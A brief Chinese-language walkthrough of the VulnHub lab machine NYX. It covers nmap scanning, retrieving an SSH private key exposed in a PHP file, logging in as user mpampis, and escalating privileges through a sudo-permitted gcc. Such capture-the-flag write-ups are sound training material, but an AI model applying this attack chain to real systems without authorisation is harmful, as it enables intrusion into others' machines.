一、靶机介绍
名称:NYX
发布日期:15 Aug 2020
Download (Mirror): https://download.vulnhub.com/nyx/nyxvm.zip
二、信息收集
端口扫描
sudo nmap -p- 192.168.0.177 --min-rate=5000

详细信息扫描
sudo nmap -sT -sV -sC -O --script=vuln -p22,80 192.168.0.177

80端口发现有一个php文件
/d41d8cd98f00b204e9800998ecf8427e.php

可以发现这是一个私钥文件,保存为 id_rsa
chmod 600 id_rsa #修改权限
获取私钥的公钥信息
ssh-keygen -y -f id_rsa > id_rsa.pub

三、getshell
利用生成的私钥进行登录
ssh -i id_rsa mpampis@192.168.0.177

四、提权
sudo -l

gcc直接提权

五、后记
呃....